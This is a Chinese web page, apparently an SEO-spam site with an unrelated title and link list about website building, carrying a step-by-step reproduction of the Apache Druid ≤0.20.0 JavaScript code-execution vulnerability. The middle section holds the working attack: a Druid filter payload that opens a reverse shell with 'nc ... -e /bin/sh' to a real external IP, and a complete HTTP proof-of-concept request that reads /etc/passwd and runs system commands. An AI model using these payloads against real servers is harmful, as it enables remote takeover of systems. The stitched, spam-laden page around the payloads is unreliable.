当前位置: 首页 > news >正文

河北邢台企业做网站珠海网站建设优化

河北邢台企业做网站,珠海网站建设优化,河北建筑培训网登录,wordpress ie8 兼容漏洞详情: Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。此功能适用于高度信任环境…

漏洞详情:

Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。

Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。此功能适用于高度信任环境,且默认情况下已禁用。但是,在Druid 0.20.0及更早版本中,经过身份验证用户可以构造传入json串来控制某些参数发送恶意的请求,强制Druid为该请求运行用户提供的JavaScript代码。由于Apache Druid默认情况下缺乏授权认证,攻击者可以利用此漏洞在目标机器上执行任意代码,最终可获取服务器的控制权限。该漏洞源于攻击者可利用恶意JSON输入,通过function参数控制Rhino引擎执行的JavaScript代码,进而调用系统命令

影响范围:

Apache Druid <= 0.20.0

漏洞复现:

pull影响范围内的druid版本镜像

docker pull vulhub/apache-druid:0.20.0

运行容器

docker run --rm -i -p 8888:8888 vulhub/docker-druid:0.20.0

开浏览器访问8888端口 ,无需认证可访问Druid console页面:

上传代码块

 Base directory==》quickstart/tutorial 

File filter==》 wikiticker-2015-09-12-sampled.json.gz

在下面这步开始抓包

 

在这里插入⬇️⬇️⬇️ function代码块

, "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 121.43.48.229 9999 -e /bin/sh')}", "": {"enabled": true}}

上传执行指令

反连shell成功🏅

 

也有现成的poc
POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"test","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}
}
验证结果 
http://www.hengruixuexiao.com/news/15050.html

相关文章:

  • 专业的网站建设公司排名拼多多关键词排名在哪里看
  • 建设银行基金网站百度怎样免费发布信息
  • 云南文山邮编免费seo教程分享
  • wordpress回复经典编辑器网站优化排名查询
  • 厦门市建设协会网站竞价如何屏蔽恶意点击
  • 北京电子商务网站制作灰色关键词排名代发
  • 百度广告投放电话营销推广seo
  • 2024 b站永不收费上海网站快速排名提升
  • 学做网站后台开发网络seo推广培训
  • 做网站5年工资多少石家庄seo结算
  • 灰色行业老域名做网站不收录免费二级域名建站
  • 东营住房与城乡建设部网站百度官方电话24小时
  • 外发加工会计分录优化工作流程
  • 建筑八大员报名官网沧州搜索引擎优化
  • 网站开发流程抚州seo服务方案
  • 外贸怎么做网站短网址生成器免费
  • 电子商务网站建设与管理学习心得最新国际新闻头条新闻
  • c2c模式是指什么苏州seo免费咨询
  • 自己来建网站天津放心站内优化seo
  • wordpress同步 说说windows优化大师要钱
  • 网站的建议丈哥seo博客工具
  • 在哪里查看网站日志网站首页排名
  • 用dw做网站的教程哈尔滨seo关键词
  • 做外账经常进哪几个网站个人怎么做百度竞价
  • 安徽做网站电话代发新闻稿最大平台
  • wordpress主题jquery杭州百度整站优化服务
  • 给你网站你会怎么做的网络运营工作内容
  • 备案的网站 能拿来做仿站吗网站建设对企业品牌价值提升的影响
  • 莱芜二中网站b站怎么推广
  • 做前端网站用什么工具郑州seo外包顾问